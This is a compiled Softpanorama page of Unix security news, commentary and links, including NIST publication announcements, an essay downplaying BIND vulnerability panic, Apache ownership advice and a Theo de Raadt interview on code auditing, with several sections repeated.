NIST announces the release of Special Publication 800-53, Revision 2, Recommended Security Controls for Federal Information Systems. This special update incorporates guidance on appropriate safeguards and countermeasures for federal industrial control systems.

NIST’s Computer Security Division (Information Technology Laboratory) and Intelligent Systems Division (Manufacturing Engineering Laboratory), in collaboration with the Department of Homeland Security and organizations within the federal government that own, operate, and maintain industrial control systems, developed the necessary industrial control system augmentations and interpretations for the security controls, control enhancements, and supplemental guidance in Special Publication 800-53.

The industrial control system augmentations and interpretations for Special Publication 800-53 will facilitate the employment of appropriate safeguards and countermeasures for these specialized information systems that are part of the critical infrastructure of the United States.

The changes to Special Publication 800-53, Revision 1 in updating to Revision 2, include:

The regular two-year update to Special Publication 800-53 will occur, as previously scheduled, in December 2008.

[Nov 14, 2006] Configuring Java Applications to Use Solaris Security.

[Nov 14, 2006] Draft SP 800-115, Technical Guide to Information Security Testing.

Draft SP 800-115, Technical Guide to Information Security Testing, is available for public comment. It seeks to assist organizations in planning and conducting technical information security testing, analyzing findings, and developing mitigation strategies. The publication provides practical recommendations for designing, implementing, and maintaining technical information security testing processes and procedures. SP 800-115 provides an overview of key elements of security testing, with an emphasis on technical testing techniques, the benefits and limitations of each technique, and recommendations for their use. Draft SP 800-115 is intended to replace SP 800-42, Guideline on Network Security Testing, which was released in 2003. Please visit the drafts page to learn how to submit comments to this draft document.

[Nov 01, 2006] Hillary Clinton's private server was open to 'low-skilled-hackers'

[Nov 1, 2006] Operational Security Capabilities for IP Network Infrastructure (opsec) Charter

[May 4, 2006] Draft Special Publication 800-80, Guide for Developing Performance Metrics for Information Security

Adobe PDF (762 KB)

NIST's Computer Security Division has completed the initial public draft of Special Publication 800-80, Guide for Developing Performance Metrics for Information Security.

This guide is intended to assist organizations in developing metrics for an information security program. The methodology links information security program performance to agency performance. It leverages agency-level strategic planning processes and uses security controls from NIST SP 800-53, Recommended Security Controls for Federal Information Systems, to characterize security performance. To facilitate the development and implementation of information security performance metrics, the guide provides templates, including at least one candidate metric for each of the security control families described in NIST SP 800-53.

[Aug 15, 2005] Draft NIST Special Publication 800-26 Revision 1, Guide for Information Security Program Assessments and System Reporting Form

Adobe pdf (1,153 KB)

The NIST Computer Security Division is pleased to announce for your review and comment draft NIST Special Publication 800-26 Revision 1, Guide for Information Security Program Assessments and System Reporting Form. This draft document brings the assessment process up to date with key standards and guidelines developed by NIST.
Please provide comments by October 17, 2005 to sec-report@nist.gov. Comment period has been closed.

[Sept 11, 2004] http://secinf.net/unix_security/

A useful list of security papers, tutorials and FAQs. Looks like created in 2002 and never updated since.

Computer Security: Art and Science. Matt Bishop, University of California - Davis ISBN: 0-201-44099-7 Addison Wesley: 2003 Cloth; 1136 pp. Published: 12/02/2002 US: $74.99

Expensive and dull book that can be used for torturing CS students :-). Attempt of broad coverage that definitely might help to killing any interest to computer security for most students...

Description
Table of Contents
Appropriate Courses
Preface
Sample Chapter
About the Author(s)

eSecurity Planet: Trends: Updated Open Source Security Testing ...

... Updated Open Source Security Testing Manual Available By Paul Desmond. Version 2
of the Open Source Security Testing Methodology Manual (OSSTMM) was posted on ...

The sky is not falling By Dev Zaborav

Recently, notifications started going out regarding a number of critical vulnerabilities in BIND, the software that powers the majority of the name servers on the Internet. In an attempt to convey the importance of these holes, many computer security experts were referring to this as the next major Internet bug -- drawing near-panicked comparisons to the massive, widespread BIND attacks of 1998. Many even went to the point of proclaiming that this incident will be the next great Internet-crippling bug.

To an extent, the concern over the announcement of the BIND vulnerabilities is valid. The Internet works as we know it because when we type a site into our browsers or email clients, name servers translate that site's name into numbers that can be routed. Without functioning name servers, the Internet becomes a much different world. Imagine having to identify friends by their telephone numbers rather than by their names. The vulnerabilities that were released at the end of January could allow attackers to take down or take control of the majority of name servers on the Internet. It was imperative that server administrators be notified as soon as possible and alerted as to the crucial nature of this problem. They were notified promptly.

However, by the time the advisories reached many security experts and members of the press, the discussions had taken on a tone of hysteria. Before the advisory was made public, the root name servers -- those that disseminate name information to the rest of the Internet's name servers -- had already been patched. It remains for system administrators on the rest of the Internet to upgrade their servers ... and many large providers and corporations reacted quickly and appropriately. At this point, the majority of Internet backbone providers have upgraded their servers.

The possibility that these vulnerabilities will take down the entire Internet is an unlikely one at best. To prove how drastic a bug this is, many experts pointed to the 1998 BIND hole, which was indeed one of the most persistently exploited vulnerabilities on the Net for a long, long time. What the experts fail to mention, however, is that at the time, the Red Hat distribution of Linux set up BIND without prompting at installation. Many Linux users didn't know they were running BIND, so they didn't think they needed to apply the patch when it became available. It's no longer the case that Red Hat installs BIND automatically; there will be fewer servers running BIND unnecessarily or unknowingly, so this vulnerability will be less prevalent. Despite their widespread effect, the great BIND attacks of 1998 didn't cause the Internet to shut down. The Internet continued along just fine, except for a few hundred compromised servers and defaced Web pages, which hardly affect the functionality of the Internet as a whole.

Another incident that experts and journalists have used to display how overwhelming this set of vulnerabilities could be occurred in late January when Microsoft's Web pages were unavailable for several hours due to a DNS problem (http://abcnews.go.com/sections/scitech/DailyNews/microsoft010125.html). While it's true that this is an example of a Website being inaccessible due to a problem with name servers, the instance is otherwise unrelated to the BIND problem. Microsoft's name servers don't run BIND, and by all indications the troubles they suffered two weeks ago were in no way similar to those caused by the holes in BIND. The constant comparison, clearly intended to heighten concern about the destruction of the entire Internet if name servers go down, smacks of sensationalism.

eveloperWorks/Linux Security: Improving the security of open UNIX platforms -- simple MD5 checking shell script(bash) by Igor Maximov (uniug@cris.net). Nothing special.

[Dec 28, 2000] NSA Security-Enhanced Linux

The has a well-defined architecture (named Flask) for flexible mandatory access controls that has been experimentally validated through several prototype systems (DTMach, DTOS, and Flask). The architecture provides clean separation of policy from enforcement, well-defined policy decision interfaces, flexibility in labeling and access decisions, support for policy changes, and fine-grained controls over the kernel abstractions. Detailed studies have been performed of the ability of the architecture to support a wide variety of security policies and are available on the DTOS and Flask web pages accessible via the Background page (http://www.nsa.gov/selinux/background.html). A published paper about the Flask architecture is also available on the Background page. The architecture and its implementation in Linux are described in detail in the documentation (http://www.nsa.gov/selinux/docs.html). RSBAC appears to have similar goals to the Security-Enhanced Linux. Like the Security-Enhanced Linux, it separates policy from enforcement and supports a variety of security policies. RSBAC uses a different architecture (the Generalized Framework for Access Control or GFAC) than the Security-Enhanced Linux, although the Flask paper notes that at the highest level of abstraction, the the Flask architecture is consistent with the GFAC. However, the GFAC does not seem to fully address the issue of policy changes and revocation, as discussed in the Flask paper. RSBAC also differs in the specifics of its policy interfaces and its controls, but a careful evaluation of the significance of these differences has not been performed.

SecurityPortal - Ask Buffy Apache Security

I am trying to implement security on the Apache Server 1.3.12 running on a Linux Red Hat 6.2. Are there any good docs or how-tos on this subject?

Aejaz Sheriff

Very few security problems exist with the Apache server itself. Having said that, however, I suggest that you upgrade to Apache 1.3.14, which solves some security issues. For online documentation of the Apache server the following URLs are excellent:

http://httpd.apache.org/docs/misc/security_tips.html
http://httpd.apache.org/docs/

The majority of Web-based security problems come from poorly written CGI programs, online databases, and the like. Razvan Peteanu has written the following article:

http://securityportal.com/cover/coverstory20001030.html - Best Practices for Secure Web Development

And I highly recommend reading it.

Buffy (buffy@securityportal.com)

Who should own Apache? I have nobody as the owner and the group, but I'm not sure if this is safe or not.

Brad

The usual default for "owning" Apache is user and group root:

-rwxr-xr-x    1 root     root
       301820 Aug 23 13:45 /usr/sbin/httpd

As for who Apache runs as, this is usually the user and group "nobody" or "apache." In both cases, these groups are heavily restricted from accessing anything important, from the httpd.conf file:

#
# If you wish httpd to run as a different user or group, you must run
# httpd as root initially and it will switch.
#
# User/Group: The name (or #number) of the user/group to run httpd as.
# . On SCO (ODT 3) use "User nouser" and "Group nogroup".
# . On HPUX you may not be able to use shared memory as nobody, and the
# suggested workaround is to create a user www and use that user.
# NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
# when the value of (unsigned)Group is above 60000;
# don't use Group nobody on these systems!
#
User apache
Group apache

Most Linux distributions now have a special user and group called "apache" for running the Apache Web server. This user is locked out (no password), the home directory is usually the www root, and no command shell is available. This is slightly safer than using nobody because the "nobody" account may be used by other services. If an attacker manages to get privileges of "nobody" on the system, she may be able to elevate privileges using some other software. Segmenting "apache" with different users is a better strategy.

Buffy (buffy@securityportal.com)

Slashdot Theo de Raadt Respond

Q: Would you and/or other members of the OpenBSD coders consider writing a book on secure, bug-free coding and auditing? Most programming books feature sample code that is written for pedagogical purposes. Quite often this runs contrary to how secure code should be written, leaving a gap in many a programmers knowledge. A book on audinting and how to avoid security pitfalls when coding would also make your life easier - less code to audit for OpenBSD, and more time top concentrate on nifty new features!!!

Theo:

There is perhaps a split between the two issues you bring up. On the one side is secure coding, as in code written to be secure by the original author(s). On the other side, auditing, which is where an outsider (or an insider) later on goes and tries to clean up the mess which remains. And there is always a mess. Perhaps part of the problem is that a huge gap lies between these two. In the end though, I think that a book on such a topic would probably have to repeat the same thing every second paragraph, throughout the book: Understand the interfaces which you are coding to! Understand the interfaces which you are coding to! Most of the security (or simply bug) issues we audited out of our source tree are just that. The programmer in question was a careless slob, not paying attention to the interface he was using. The repeated nature of the same classes of bugs throughout the source tree, also showed us that most programmers learn to code by (bad) examples. A solid systems's approach should not be based on "but it works". Yet, time and time again, we see that for most people this is the case. They don't care about good software, only about "good enough" software. So the programmers can continue to make such mistakes. Thus, I do not feel all that excited about writing a book which would simply teach people that the devil is in the details. If they haven't figured it out by now, perhaps they should consider another occupation (one where they will cause less damage).

OpenBSD has a well deserved reputation for security "out of the box" and for the fact the inbuilt tools are as secure as they're ever likely to be. However, the Ports system is, perhaps, an example of where the secure approach currently has limitations - an installation of OpenBSD running popular third-party systems like INN can only be so secure because the auditing of INN, and other such software, is outside the scope of the BSD audit.

My question is, has the OpenBSD team ever proposed looking into how to create a 'secured ports' tree, or some other similar system, that would ensure that many of the applications people specifically want secure platforms like OpenBSD to run could be as trusted as the platforms themselves?

Theo:

We have our hands already pretty full, just researching new ideas in our main source tree, which is roughly 300MB in size. We also lightly involved ourselves in working with the XFree86 people a while back for some components there. Auditing the components outside of this becomes rather unwieldy. The difficulty lies not only in the volume of such code, but also in other issues. Sometimes communication with the maintainers of these other packages is difficult, for various reasons. Sometimes they are immediately turned off because we don't use the word Linux. Some of these portable software packages are by their nature never really going to approach the quality of regular system software, because they are so bulky.

But most importantly, please remember that we are also human beings, trying to live our lives in a pleasant way, and don't usually get all that excited about suddenly burning 800 hours in some disgusting piece of badly programmer trash which we can just avoid running. I suppose that quite often some of our auditors look at a piece of code and go "oh, wow, this is really bad", and then just avoid using it. I know that doesn't make you guys feel better, but what can we say...

With the release of SGI's B1 code, and the attempts by many U*ixen to secure their contents via capabilities, ACL's, etc, ad nausium, how is OpenBSD approaching the issue of resource control?

... ...

Theo:

On the first question, I think there is great confusion in the land of Orange Book. Many people think that is about security. It is not. Largely, those standards are about accountability in the face of threat. Which really isn't about making systems secure. It's about knowing when your system's security breaks down. Not quite the same thing. Please count the commercially deployed C, B, or even A systems which are actually being used by real people for real work, before foaming at the mouth about it all being "so great". On the other hand, I think we wil see if some parts of that picture actually start to show up in real systems, over time. By the way, I am surprised to see you list ACLs, which don't really have anything to do with B1 systems.

Did the drive to audit code come from the need or the design of BSD? Or was it initially a whim? More imporantly, where did you learn it from? Is their some "mentor" you looked too for ridge design? I have to admire your team's daunting code reviewing...I wonder if I'll ever have that kind of meticulous coding nature.

Theo:

The auditing process developed out of a desire to improve the quality of our operating system. Once we started on it, it becomes fascinating, fun, and very nearly fanatical. About ten people worked together on it, basically teaching ourselves as things went along. We searched for basic source-code programmer mistakes and sloppiness, rather than "holes" or "bugs". We just kept recursing through the source tree everytime we found a sloppiness. Everytime we found a mistake a programmer made (such as using mktemp(3) in such a way that a filesystem race occurred), we would go throughout the source tree and fix ALL of them. Then when we fix that one, we would find some other basic mistake, and then fix ALL of them. Yes, it's a lot of work. But it has a serious payback. Can you imagine if a Boeing engineer didn't fix ALL of the occurrences of a wiring flaw? Why not at least try to engineer software in the same way?

Older news were moved to a separate file due to volume -- see OSS Security Chronicle


eSecurity Planet: Trends: Updated Open Source Security Testing ...

... Updated Open Source Security Testing Manual Available By Paul Desmond. Version 2
of the Open Source Security Testing Methodology Manual (OSSTMM) was posted on ...

eSecurity Planet: Trends: Updated Open Source Security Testing ...

... Updated Open Source Security Testing Manual Available By Paul Desmond. Version 2
of the Open Source Security Testing Methodology Manual (OSSTMM) was posted on ...

The sky is not falling By Dev Zaborav

Recently, notifications started going out regarding a number of critical vulnerabilities in BIND, the software that powers the majority of the name servers on the Internet. In an attempt to convey the importance of these holes, many computer security experts were referring to this as the next major Internet bug -- drawing near-panicked comparisons to the massive, widespread BIND attacks of 1998. Many even went to the point of proclaiming that this incident will be the next great Internet-crippling bug.

To an extent, the concern over the announcement of the BIND vulnerabilities is valid. The Internet works as we know it because when we type a site into our browsers or email clients, name servers translate that site's name into numbers that can be routed. Without functioning name servers, the Internet becomes a much different world. Imagine having to identify friends by their telephone numbers rather than by their names. The vulnerabilities that were released at the end of January could allow attackers to take down or take control of the majority of name servers on the Internet. It was imperative that server administrators be notified as soon as possible and alerted as to the crucial nature of this problem. They were notified promptly.

However, by the time the advisories reached many security experts and members of the press, the discussions had taken on a tone of hysteria. Before the advisory was made public, the root name servers -- those that disseminate name information to the rest of the Internet's name servers -- had already been patched. It remains for system administrators on the rest of the Internet to upgrade their servers ... and many large providers and corporations reacted quickly and appropriately. At this point, the majority of Internet backbone providers have upgraded their servers.

The possibility that these vulnerabilities will take down the entire Internet is an unlikely one at best. To prove how drastic a bug this is, many experts pointed to the 1998 BIND hole, which was indeed one of the most persistently exploited vulnerabilities on the Net for a long, long time. What the experts fail to mention, however, is that at the time, the Red Hat distribution of Linux set up BIND without prompting at installation. Many Linux users didn't know they were running BIND, so they didn't think they needed to apply the patch when it became available. It's no longer the case that Red Hat installs BIND automatically; there will be fewer servers running BIND unnecessarily or unknowingly, so this vulnerability will be less prevalent. Despite their widespread effect, the great BIND attacks of 1998 didn't cause the Internet to shut down. The Internet continued along just fine, except for a few hundred compromised servers and defaced Web pages, which hardly affect the functionality of the Internet as a whole.

Another incident that experts and journalists have used to display how overwhelming this set of vulnerabilities could be occurred in late January when Microsoft's Web pages were unavailable for several hours due to a DNS problem (http://abcnews.go.com/sections/scitech/DailyNews/microsoft010125.html). While it's true that this is an example of a Website being inaccessible due to a problem with name servers, the instance is otherwise unrelated to the BIND problem. Microsoft's name servers don't run BIND, and by all indications the troubles they suffered two weeks ago were in no way similar to those caused by the holes in BIND. The constant comparison, clearly intended to heighten concern about the destruction of the entire Internet if name servers go down, smacks of sensationalism.

eveloperWorks/Linux Security: Improving the security of open UNIX platforms -- simple MD5 checking shell script(bash) by Igor Maximov (uniug@cris.net). Nothing special.

[Dec 28, 2000] NSA Security-Enhanced Linux

The has a well-defined architecture (named Flask) for flexible mandatory access controls that has been experimentally validated through several prototype systems (DTMach, DTOS, and Flask). The architecture provides clean separation of policy from enforcement, well-defined policy decision interfaces, flexibility in labeling and access decisions, support for policy changes, and fine-grained controls over the kernel abstractions. Detailed studies have been performed of the ability of the architecture to support a wide variety of security policies and are available on the DTOS and Flask web pages accessible via the Background page (http://www.nsa.gov/selinux/background.html). A published paper about the Flask architecture is also available on the Background page. The architecture and its implementation in Linux are described in detail in the documentation (http://www.nsa.gov/selinux/docs.html). RSBAC appears to have similar goals to the Security-Enhanced Linux. Like the Security-Enhanced Linux, it separates policy from enforcement and supports a variety of security policies. RSBAC uses a different architecture (the Generalized Framework for Access Control or GFAC) than the Security-Enhanced Linux, although the Flask paper notes that at the highest level of abstraction, the the Flask architecture is consistent with the GFAC. However, the GFAC does not seem to fully address the issue of policy changes and revocation, as discussed in the Flask paper. RSBAC also differs in the specifics of its policy interfaces and its controls, but a careful evaluation of the significance of these differences has not been performed.

SecurityPortal - Ask Buffy Apache Security

I am trying to implement security on the Apache Server 1.3.12 running on a Linux Red Hat 6.2. Are there any good docs or how-tos on this subject?

Aejaz Sheriff

Very few security problems exist with the Apache server itself. Having said that, however, I suggest that you upgrade to Apache 1.3.14, which solves some security issues. For online documentation of the Apache server the following URLs are excellent:

http://httpd.apache.org/docs/misc/security_tips.html
http://httpd.apache.org/docs/

The majority of Web-based security problems come from poorly written CGI programs, online databases, and the like. Razvan Peteanu has written the following article:

http://securityportal.com/cover/coverstory20001030.html - Best Practices for Secure Web Development

And I highly recommend reading it.

Buffy (buffy@securityportal.com)

Who should own Apache? I have nobody as the owner and the group, but I'm not sure if this is safe or not.

Brad

The usual default for "owning" Apache is user and group root:

-rwxr-xr-x    1 root     root
       301820 Aug 23 13:45 /usr/sbin/httpd

As for who Apache runs as, this is usually the user and group "nobody" or "apache." In both cases, these groups are heavily restricted from accessing anything important, from the httpd.conf file:

#
# If you wish httpd to run as a different user or group, you must run
# httpd as root initially and it will switch.
#
# User/Group: The name (or #number) of the user/group to run httpd as.
# . On SCO (ODT 3) use "User nouser" and "Group nogroup".
# . On HPUX you may not be able to use shared memory as nobody, and the
# suggested workaround is to create a user www and use that user.
# NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
# when the value of (unsigned)Group is above 60000;
# don't use Group nobody on these systems!
#
User apache
Group apache

Most Linux distributions now have a special user and group called "apache" for running the Apache Web server. This user is locked out (no password), the home directory is usually the www root, and no command shell is available. This is slightly safer than using nobody because the "nobody" account may be used by other services. If an attacker manages to get privileges of "nobody" on the system, she may be able to elevate privileges using some other software. Segmenting "apache" with different users is a better strategy.

Buffy (buffy@securityportal.com)

Slashdot Theo de Raadt Respond

Q: Would you and/or other members of the OpenBSD coders consider writing a book on secure, bug-free coding and auditing? Most programming books feature sample code that is written for pedagogical purposes. Quite often this runs contrary to how secure code should be written, leaving a gap in many a programmers knowledge. A book on audinting and how to avoid security pitfalls when coding would also make your life easier - less code to audit for OpenBSD, and more time top concentrate on nifty new features!!!

Theo:

There is perhaps a split between the two issues you bring up. On the one side is secure coding, as in code written to be secure by the original author(s). On the other side, auditing, which is where an outsider (or an insider) later on goes and tries to clean up the mess which remains. And there is always a mess. Perhaps part of the problem is that a huge gap lies between these two. In the end though, I think that a book on such a topic would probably have to repeat the same thing every second paragraph, throughout the book: Understand the interfaces which you are coding to! Understand the interfaces which you are coding to! Most of the security (or simply bug) issues we audited out of our source tree are just that. The programmer in question was a careless slob, not paying attention to the interface he was using. The repeated nature of the same classes of bugs throughout the source tree, also showed us that most programmers learn to code by (bad) examples. A solid systems's approach should not be based on "but it works". Yet, time and time again, we see that for most people this is the case. They don't care about good software, only about "good enough" software. So the programmers can continue to make such mistakes. Thus, I do not feel all that excited about writing a book which would simply teach people that the devil is in the details. If they haven't figured it out by now, perhaps they should consider another occupation (one where they will cause less damage).

OpenBSD has a well deserved reputation for security "out of the box" and for the fact the inbuilt tools are as secure as they're ever likely to be. However, the Ports system is, perhaps, an example of where the secure approach currently has limitations - an installation of OpenBSD running popular third-party systems like INN can only be so secure because the auditing of INN, and other such software, is outside the scope of the BSD audit.

My question is, has the OpenBSD team ever proposed looking into how to create a 'secured ports' tree, or some other similar system, that would ensure that many of the applications people specifically want secure platforms like OpenBSD to run could be as trusted as the platforms themselves?

Theo:

We have our hands already pretty full, just researching new ideas in our main source tree, which is roughly 300MB in size. We also lightly involved ourselves in working with the XFree86 people a while back for some components there. Auditing the components outside of this becomes rather unwieldy. The difficulty lies not only in the volume of such code, but also in other issues. Sometimes communication with the maintainers of these other packages is difficult, for various reasons. Sometimes they are immediately turned off because we don't use the word Linux. Some of these portable software packages are by their nature never really going to approach the quality of regular system software, because they are so bulky.

But most importantly, please remember that we are also human beings, trying to live our lives in a pleasant way, and don't usually get all that excited about suddenly burning 800 hours in some disgusting piece of badly programmer trash which we can just avoid running. I suppose that quite often some of our auditors look at a piece of code and go "oh, wow, this is really bad", and then just avoid using it. I know that doesn't make you guys feel better, but what can we say...

With the release of SGI's B1 code, and the attempts by many U*ixen to secure their contents via capabilities, ACL's, etc, ad nausium, how is OpenBSD approaching the issue of resource control?

... ...

Theo:

On the first question, I think there is great confusion in the land of Orange Book. Many people think that is about security. It is not. Largely, those standards are about accountability in the face of threat. Which really isn't about making systems secure. It's about knowing when your system's security breaks down. Not quite the same thing. Please count the commercially deployed C, B, or even A systems which are actually being used by real people for real work, before foaming at the mouth about it all being "so great". On the other hand, I think we wil see if some parts of that picture actually start to show up in real systems, over time. By the way, I am surprised to see you list ACLs, which don't really have anything to do with B1 systems.

Did the drive to audit code come from the need or the design of BSD? Or was it initially a whim? More imporantly, where did you learn it from? Is their some "mentor" you looked too for ridge design? I have to admire your team's daunting code reviewing...I wonder if I'll ever have that kind of meticulous coding nature.

Theo:

The auditing process developed out of a desire to improve the quality of our operating system. Once we started on it, it becomes fascinating, fun, and very nearly fanatical. About ten people worked together on it, basically teaching ourselves as things went along. We searched for basic source-code programmer mistakes and sloppiness, rather than "holes" or "bugs". We just kept recursing through the source tree everytime we found a sloppiness. Everytime we found a mistake a programmer made (such as using mktemp(3) in such a way that a filesystem race occurred), we would go throughout the source tree and fix ALL of them. Then when we fix that one, we would find some other basic mistake, and then fix ALL of them. Yes, it's a lot of work. But it has a serious payback. Can you imagine if a Boeing engineer didn't fix ALL of the occurrences of a wiring flaw? Why not at least try to engineer software in the same way?

Older news were moved to a separate file due to volume -- see OSS Security Chronicle


eSecurity Planet: Trends: Updated Open Source Security Testing ...

... Updated Open Source Security Testing Manual Available By Paul Desmond. Version 2
of the Open Source Security Testing Methodology Manual (OSSTMM) was posted on ...

Recommended Links

Softpanorama Top Visited

Softpanorama Recommended

Top dozen

  1. ***** NIST CSRC Home Page -- for a government site this is simply outstanding ;-)
  2. ***** CIAC -- provides vulnerabilities reports. The site also contains other materials but of much lesser quality and value.
  3. ***** NSA -- NSA guidelines. Not all of them are of equal quality (some can serve as an illustration of NSA degradation ;-) and some are outdated, but still ...
  4. **** The SANS Institute - A Cooperative Research and Education Organization -- contains top 20 list of vulnerabilities: questionable but still useful resource.
  5. **** ISS security library.
  6. **** Ronald L. Rivest Cryptography and Security -- nice collection of links
  7. ***** Console/Firewall and Security -- Freshmeat collection of tools
  8. Security Focus - computer security information clearinghouse. Includes a calendar, free tools, forums, industry news, and a library.
  9. ***+ Unix Security -- NIH Security Resources -- links from National Institutes of Health. One of the best collection of security-related links. A decent collection of outdated computer security resources, including documents, links to other web pages, and tools.
  10. *** Corporate Technologies Technical Library -- contains the list of free security software. Peter Galvin is chief technologist for Corporate Technologies, Inc.
  11. *** http://www.cs.purdue.edu/coast/archive/data/category_index.html -- COAST: outdated and badly maintained, but still sometimes useful
  12. *** Root Shell -- Security and Exploit reference. A little bit speculative

Non-government

Vendors:

Government:

University Centers


Archives

Information about major open source security tools can be found at Softpanorama University Classic Open Source Unix Security Tools. Here are some archives that one might find useful:


Usenet and lists

**** BugTraq -- full-disclosure UNIX security mailing list.

RISKS-LIST RISKS-FORUM Digest

www.eds.org -- The Security-Audit Mailing list FAQ


See Also


History

Improving the Security of Your UNIX System by David A. Curry.The "SRI Paper" that has been widely distributed around the Internet. It was written in 1990 and was a predecessor to the UNIX System Security book. David A. Curry is the author of UNIX Systems Programming for SVR4 and is also active tool developer (see his home page for the complete list). Among them are (description are borrowed from the author's page):

How to improve security on SunOS.4.1.3 -- outdated, but some information can be useful

Improving the Security of Your Site by Breaking Into it -- famous (now outdated) SATAN-related paper. Not that SATAN was better than other, but the name provoke a media craziness that gave the authors a lot of exposure...

1993: An Architectural Overview of UNIX Network Security February 18, 1993 Robert B. Reinhardt breinhar@access.digex.com


Philosophy


Tutorials

See also CIAC advisories below. Shorter tutorials are listed in Articles. There is also a useful list at http://secinf.net/unix_security/

Etc


Magazines


Government Publications

NIST

CIAC

CERT:


Vendors Pages

See also: SecurityPortal -- recent security news. Good...

IBM Security home page

Red Hat

Caldera's security page.


FAQs

See also metalinks:

Security FAQs - the list of security-related FAQs maintained by Internet Security Systems, Inc.

Shadow Password HOWTO Note. caldera 1.3 and later install shadow password file by default. RedHat 6.0 and later also instell shadow password file.

Security HOWTO

[Nov.7,1998] www.eds.org -- The Security-Audit Mailing list FAQ

Frequently Asked Questions (FAQ)


ACL


VPN


X-Windows Security


Random Findings




Etc

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available in our efforts to advance understanding of environmental, political, human rights, economic, democracy, scientific, and social justice issues, etc. We believe this constitutes a 'fair use' of any such copyrighted material as provided for in section 107 of the US Copyright Law. In accordance with Title 17 U.S.C. Section 107, the material on this site is distributed without profit exclusivly for research and educational purposes.   If you wish to use copyrighted material from this site for purposes of your own that go beyond 'fair use', you must obtain permission from the copyright owner. 

ABUSE: IPs or network segments from which we detect a stream of probes might be blocked for no less then 90 days. Multiple types of probes increase this period.  

Society

Groupthink : Two Party System as Polyarchy : Corruption of Regulators : Bureaucracies : Understanding Micromanagers and Control Freaks : Toxic Managers :   Harvard Mafia : Diplomatic Communication : Surviving a Bad Performance Review : Insufficient Retirement Funds as Immanent Problem of Neoliberal Regime : PseudoScience : Who Rules America : Neoliberalism  : The Iron Law of Oligarchy : Libertarian Philosophy

Quotes

War and Peace : Skeptical Finance : John Kenneth Galbraith :Talleyrand : Oscar Wilde : Otto Von Bismarck : Keynes : George Carlin : Skeptics : Propaganda  : SE quotes : Language Design and Programming Quotes : Random IT-related quotesSomerset Maugham : Marcus Aurelius : Kurt Vonnegut : Eric Hoffer : Winston Churchill : Napoleon Bonaparte : Ambrose BierceBernard Shaw : Mark Twain Quotes

Bulletin:

Vol 25, No.12 (December, 2013) Rational Fools vs. Efficient Crooks The efficient markets hypothesis : Political Skeptic Bulletin, 2013 : Unemployment Bulletin, 2010 :  Vol 23, No.10 (October, 2011) An observation about corporate security departments : Slightly Skeptical Euromaydan Chronicles, June 2014 : Greenspan legacy bulletin, 2008 : Vol 25, No.10 (October, 2013) Cryptolocker Trojan (Win32/Crilock.A) : Vol 25, No.08 (August, 2013) Cloud providers as intelligence collection hubs : Financial Humor Bulletin, 2010 : Inequality Bulletin, 2009 : Financial Humor Bulletin, 2008 : Copyleft Problems Bulletin, 2004 : Financial Humor Bulletin, 2011 : Energy Bulletin, 2010 : Malware Protection Bulletin, 2010 : Vol 26, No.1 (January, 2013) Object-Oriented Cult : Political Skeptic Bulletin, 2011 : Vol 23, No.11 (November, 2011) Softpanorama classification of sysadmin horror stories : Vol 25, No.05 (May, 2013) Corporate bullshit as a communication method  : Vol 25, No.06 (June, 2013) A Note on the Relationship of Brooks Law and Conway Law

History:

Fifty glorious years (1950-2000): the triumph of the US computer engineering : Donald Knuth : TAoCP and its Influence of Computer Science : Richard Stallman : Linus Torvalds  : Larry Wall  : John K. Ousterhout : CTSS : Multix OS Unix History : Unix shell history : VI editor : History of pipes concept : Solaris : MS DOSProgramming Languages History : PL/1 : Simula 67 : C : History of GCC developmentScripting Languages : Perl history   : OS History : Mail : DNS : SSH : CPU Instruction Sets : SPARC systems 1987-2006 : Norton Commander : Norton Utilities : Norton Ghost : Frontpage history : Malware Defense History : GNU Screen : OSS early history

Classic books:

The Peter Principle : Parkinson Law : 1984 : The Mythical Man-MonthHow to Solve It by George Polya : The Art of Computer Programming : The Elements of Programming Style : The Unix Hater’s Handbook : The Jargon file : The True Believer : Programming Pearls : The Good Soldier Svejk : The Power Elite

Most popular humor pages:

Manifest of the Softpanorama IT Slacker Society : Ten Commandments of the IT Slackers Society : Computer Humor Collection : BSD Logo Story : The Cuckoo's Egg : IT Slang : C++ Humor : ARE YOU A BBS ADDICT? : The Perl Purity Test : Object oriented programmers of all nations : Financial Humor : Financial Humor Bulletin, 2008 : Financial Humor Bulletin, 2010 : The Most Comprehensive Collection of Editor-related Humor : Programming Language Humor : Goldman Sachs related humor : Greenspan humor : C Humor : Scripting Humor : Real Programmers Humor : Web Humor : GPL-related Humor : OFM Humor : Politically Incorrect Humor : IDS Humor : "Linux Sucks" Humor : Russian Musical Humor : Best Russian Programmer Humor : Microsoft plans to buy Catholic Church : Richard Stallman Related Humor : Admin Humor : Perl-related Humor : Linus Torvalds Related humor : PseudoScience Related Humor : Networking Humor : Shell Humor : Financial Humor Bulletin, 2011 : Financial Humor Bulletin, 2012 : Financial Humor Bulletin, 2013 : Java Humor : Software Engineering Humor : Sun Solaris Related Humor : Education Humor : IBM Humor : Assembler-related Humor : VIM Humor : Computer Viruses Humor : Bright tomorrow is rescheduled to a day after tomorrow : Classic Computer Humor

The Last but not Least


Copyright © 1996-2015 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author free time. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License.

The site uses AdSense so you need to be aware of Google privacy policy. You you do not want to be tracked by Google please disable Javascript for this site. This site is perfectly usable without Javascript.

Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.

This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contain some broken links as it develops like a living tree...

You can use PayPal to make a contribution, supporting development of this site and speed up access. In case softpanorama.org is down currently there are two functional mirrors: softpanorama.info (the fastest) and softpanorama.net.

Disclaimer:

The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the author present and former employers, SDNP or any other organization the author may be associated with. We do not warrant the correctness of the information provided or its fitness for any purpose.

Last modified: June 03, 2016